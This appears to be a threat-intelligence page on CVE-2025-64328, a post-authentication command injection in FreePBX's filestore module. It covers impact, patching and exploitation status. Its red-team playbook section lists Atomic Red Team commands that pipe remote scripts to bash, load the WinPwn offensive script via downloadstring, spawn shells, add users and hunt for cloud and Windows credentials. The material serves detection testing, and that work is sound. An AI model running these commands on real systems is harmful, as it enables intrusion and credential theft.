CVE-2025-64328
Overview
This vulnerability is a post-authentication command injection in the filestore module of FreePBX Endpoint Manager. The root cause is improper input sanitization in the check_ssh_connect() function invoked via the testconnection feature within the Administrative interface. The flaw allows execution of arbitrary commands due to unsafe handling of SSH connection parameters by authenticated users.
Vulnerability Description
FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. In versions 17.0.2.36 and above before 17.0.3, the filestore module within the Administrative interface is vulnerable to a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function. An attacker can leverage this vulnerability to obtain remote access to the system as an asterisk user. This issue is fixed in version 17.0.3.
Impact
An attacker with valid authentication can execute arbitrary commands on the FreePBX system as the 'asterisk' user, effectively gaining remote shell access. This enables unauthorized system control, potential data compromise, and lateral movement within the telephony infrastructure. The prerequisite is possession of an authenticated user account with access to the Administrative interface. Such access can lead to full system compromise and disruption of telephony services.
Solution
Apply the official update to FreePBX Endpoint Manager filestore module by upgrading to version 17.0.3 or later, as detailed in the FreePBX security advisory at https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw. This update patches the command injection flaw in the check_ssh_connect() function. No additional workarounds are specified by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the FreePBX Endpoint Manager arises from a flaw within the filestore module of the Administrative interface, specifically in the testconnection -> check_ssh_connect() function. This issue allows an authenticated user to execute arbitrary commands on the server, leading to a post-authentication command injection vulnerability. The critical aspect of this vulnerability is that it requires the attacker to already possess valid credentials, which lowers the barrier for exploitation but raises significant concerns regarding the security of the system. Once exploited, an attacker can gain remote access to the system as an asterisk user, which could potentially lead to unauthorized access to sensitive telephony data and control over telephony services.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting authenticated users who have access to the Administrative interface. An attacker could leverage social engineering techniques to gain access to valid user credentials or exploit weak password policies. Once authenticated, the attacker could invoke the vulnerable function, injecting malicious commands that the system would execute with the privileges of the asterisk user. This could allow the attacker to manipulate telephony configurations, intercept calls, or even pivot to other systems within the network, thereby escalating the impact of the attack.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on FreePBX for their telephony services. The ability to execute arbitrary commands can lead to severe disruptions in communication services, data breaches involving sensitive call logs and recordings, and potential compliance violations, especially for organizations in regulated industries. Furthermore, the financial ramifications could be substantial, as organizations may face costs associated with incident response, system recovery, and potential legal liabilities stemming from data breaches. The reputational damage from such an incident could also deter customers and partners, leading to long-term business risks.
To effectively detect and mitigate this vulnerability, organizations should prioritize updating their FreePBX systems to the patched version that addresses the flaw. Regularly applying security updates and patches is a fundamental practice in maintaining cybersecurity hygiene. Additionally, implementing robust access controls and monitoring user activity within the Administrative interface can help detect any suspicious behavior indicative of exploitation attempts. Organizations should also consider employing intrusion detection systems (IDS) that can identify anomalous command executions or unexpected access patterns, providing an additional layer of security. Educating users about the importance of strong password policies and recognizing social engineering tactics can further reduce the risk of credential compromise.
In conclusion, the vulnerability within the FreePBX Endpoint Manager presents a serious threat to organizations utilizing this telephony system. The potential for post-authentication command injection by authenticated users underscores the importance of maintaining rigorous security practices, including timely updates, user education, and proactive monitoring. By addressing these vulnerabilities and implementing comprehensive security measures, organizations can significantly mitigate the risks associated with this and similar vulnerabilities in the future.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-64328, with telemetry indicating a significant uptick in attempts to exploit the authenticated command injection vulnerability within the FreePBX filestore module. This increase aligns with a rising EPSS score, reflecting growing confidence in the exploitability and potential impact of this flaw. Additionally, new proof-of-concept exploits have surfaced publicly, including a Metasploit module that facilitates automated exploitation by authenticated users, which lowers the barrier for adversaries to leverage this vulnerability. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanding exploit landscape and increased detection frequency suggest heightened interest from threat actors. For defenders, this evolution underscores an elevated threat posture, as the vulnerability’s exploitation can lead to remote code execution with asterisk user privileges, potentially enabling lateral movement or persistent access within affected environments. Consequently, the risk level associated with CVE-2025-64328 has intensified, warranting increased vigilance and prioritization in security monitoring and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sangoma | Firestore | All |
cpe:2.3:a:sangoma:firestore:*:*:*:*:*:freepbx:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
FreePBX filestore authenticated command injection
exploits/unix/http/freepbx_filestore_cmd_injection
|
Cory Billington | Unknown | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
mcorybillington/CVE-2025-64328_FreePBX-framework-Command-Injection
CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module.
|
mcorybillington | 1 | 1 | 2025-11-15 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-64328 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/FreePBX/filestore/blob/f0e3983059271efd80b483ec823310ef19a59013/drivers/SSH/testconnection.php#L2 |
| freepbx.org |
GitHub CVE
x_refsource_MISC
|
https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80 |
| cisa.gov |
NVD API
Third Party Advisory
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-64328 |
| fortinet.com |
NVD API
Exploit
Third Party Advisory
|
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp |